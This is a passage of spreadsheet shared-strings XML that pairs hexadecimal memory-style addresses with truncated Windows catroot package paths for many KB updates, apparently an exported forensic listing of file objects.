    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2719857_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e1748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2698365~31bf385</t>
  </si>
  <si>
    <t>0xdf6e1a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2698365_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e1e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2690533~31bf385</t>
  </si>
  <si>
    <t>0xdf6e1f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2703157~31bf385</t>
  </si>
  <si>
    <t>0xdf6e2190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2726535_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e22d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2727528_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e24a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2719857~31bf385</t>
  </si>
  <si>
    <t>0xdf6e27e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2705219~31bf385</t>
  </si>
  <si>
    <t>0xdf6e2af8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2705219_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e2e10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2705219_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e3118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2729094_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e3430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2727528~31bf385</t>
  </si>
  <si>
    <t>0xdf6e3748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2727528_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e3950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2729094_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e3b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2726535~31bf385</t>
  </si>
  <si>
    <t>0xdf6e3e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2726535_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e4298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2732487_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e4470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2731771_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e4788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2729452~31bf385</t>
  </si>
  <si>
    <t>0xdf6e4aa0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2729452_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e4be0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2731771_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e4f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2729094~31bf385</t>
  </si>
  <si>
    <t>0xdf6e5028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2731771~31bf385</t>
  </si>
  <si>
    <t>0xdf6e52e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2732487~31bf385</t>
  </si>
  <si>
    <t>0xdf6e54e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2742599_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e5820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2732487_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e59f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2732059~31bf385</t>
  </si>
  <si>
    <t>~~6.1.5.1.c</t>
  </si>
  <si>
    <t>0xdf6e5d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2732059_SP1~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.5</t>
  </si>
  <si>
    <t>0xdf6e6288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2750841~31bf385</t>
  </si>
  <si>
    <t>0xdf6e65a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2750841_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e68b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2742599~31bf385</t>
  </si>
  <si>
    <t>0xdf6e69f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2758857_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e6bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2736422~31bf385</t>
  </si>
  <si>
    <t>0xdf6e6ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2736422_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e7028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2758857_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e7268</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2763523_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e7648</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2761217_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e7788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2770660~31bf385</t>
  </si>
  <si>
    <t>0xdf6e7960</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2761217_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e7c78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2758857~31bf385</t>
  </si>
  <si>
    <t>0xdf6e7db8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2761217~31bf385</t>
  </si>
  <si>
    <t>0xdf6e82f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2773072_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e8608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2773072_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e8920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2770660_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e8a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2786081_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e8c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2770660_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e8ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2763523~31bf385</t>
  </si>
  <si>
    <t>0xdf6e9148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2807986_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e9320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2799926_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e9638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2789645~31bf385</t>
  </si>
  <si>
    <t>0xdf6e9950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2789645_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e9a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2799926_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e9c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2786081~31bf385</t>
  </si>
  <si>
    <t>0xdf6e9f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2773072~31bf385</t>
  </si>
  <si>
    <t>0xdf6ea300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2807986~31bf385</t>
  </si>
  <si>
    <t>0xdf6ea440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2813347_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6ea778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2807986_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ea950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2800095~31bf385</t>
  </si>
  <si>
    <t>0xdf6eac68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2800095_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6eaf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2799926~31bf385</t>
  </si>
  <si>
    <t>0xdf6eb278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2813430_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6eb590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2813347~31bf385</t>
  </si>
  <si>
    <t>0xdf6eb6d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2813430~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.4.c</t>
  </si>
  <si>
    <t>0xdf6eb8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2813347_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ebc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2808679~31bf385</t>
  </si>
  <si>
    <t>0xdf6ebf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2808679_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ec228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2836942~31bf385</t>
  </si>
  <si>
    <t>0xdf6ec608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2834140~31bf385</t>
  </si>
  <si>
    <t>0xdf6ec748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2840631~31bf385</t>
  </si>
  <si>
    <t>0xdf6ec920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2834140_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ecc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2820331~31bf385</t>
  </si>
  <si>
    <t>0xdf6ecd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2836942_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ecee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2820331_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ed288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2843630~31bf385</t>
  </si>
  <si>
    <t>~~6.1.3.1.c</t>
  </si>
  <si>
    <t>0xdf6ed5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2843630_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ed8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2840631_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ed9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2847927_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6edbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2836943~31bf385</t>
  </si>
  <si>
    <t>0xdf6edee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2836943_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ee2f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2853952_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6ee430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2861698_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ee608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2852386~31bf385</t>
  </si>
  <si>
    <t>0xdf6ee920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2852386_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6eea60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2853952_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6eec38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2847927~31bf385</t>
  </si>
  <si>
    <t>0xdf6eeee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2847927_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6ef288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862152_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ef3c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862330_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ef5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2861698~31bf385</t>
  </si>
  <si>
    <t>0xdf6ef8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2857650~31bf385</t>
  </si>
  <si>
    <t>0xdf6efbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2857650_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6efee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2853952~31bf385</t>
  </si>
  <si>
    <t>0xdf6f0248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862335_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f0560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862335_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6f06a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862335~31bf385</t>
  </si>
  <si>
    <t>0xdf6f0878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862330~31bf385</t>
  </si>
  <si>
    <t>0xdf6f0c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862330_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6f0ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2862152~31bf385</t>
  </si>
  <si>
    <t>0xdf6f11c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2871997~31bf385</t>
  </si>
  <si>
    <t>~~6.1.2.5.c</t>
  </si>
  <si>
    <t>0xdf6f15a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2868038~31bf385</t>
  </si>
  <si>
    <t>0xdf6f16e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2884256~31bf385</t>
  </si>
  <si>
    <t>0xdf6f18b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2868038_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f1bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2864202~31bf385</t>
  </si>
  <si>
    <t>0xdf6f1d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2871997_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f1ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2864202_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f21b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2888049~31bf385</t>
  </si>
  <si>
    <t>0xdf6f24c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2888049_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f2810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2884256_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f2b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2882822~31bf385</t>
  </si>
  <si>
    <t>0xdf6f2c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2891804~31bf385</t>
  </si>
  <si>
    <t>0xdf6f2e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2882822_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f31c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2893294~31bf385</t>
  </si>
  <si>
    <t>0xdf6f3300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2900986_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f34d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2893294_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f37f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2892074~31bf385</t>
  </si>
  <si>
    <t>0xdf6f3930</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2893519_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f3b08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2892074_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f3e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2891804_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f41c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2908783_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6f4300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2911501_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f44d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2900986~31bf385</t>
  </si>
  <si>
    <t>0xdf6f47f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2894844~31bf385</t>
  </si>
  <si>
    <t>0xdf6f4b08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2894844_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f4e20</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2893519~31bf385</t>
  </si>
  <si>
    <t>0xdf6f5118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2912390~31bf385</t>
  </si>
  <si>
    <t>0xdf6f5430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2912390_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f5748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2911501~31bf385</t>
  </si>
  <si>
    <t>0xdf6f5950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2918077_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f5b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2908783~31bf385</t>
  </si>
  <si>
    <t>0xdf6f5e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2908783_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f60f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2931356_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f64d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2923545_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f6618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2943357_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f67f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2919469~31bf385</t>
  </si>
  <si>
    <t>0xdf6f6b08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2919469_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f6c48</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2923545~31bf385</t>
  </si>
  <si>
    <t>0xdf6f6f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2918077~31bf385</t>
  </si>
  <si>
    <t>0xdf6f7148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2952664_SP1~31b</t>
  </si>
  <si>
    <t>3.11.c</t>
  </si>
  <si>
    <t>0xdf6f7460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2943357~31bf385</t>
  </si>
  <si>
    <t>0xdf6f77a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2937610~31bf385</t>
  </si>
  <si>
    <t>0xdf6f7ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2937610_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f7c00</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2952664~31bf385</t>
  </si>
  <si>
    <t>~~6.1.23.11</t>
  </si>
  <si>
    <t>0xdf6f7dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2931356~31bf385</t>
  </si>
  <si>
    <t>0xdf6f8158</t>
  </si>
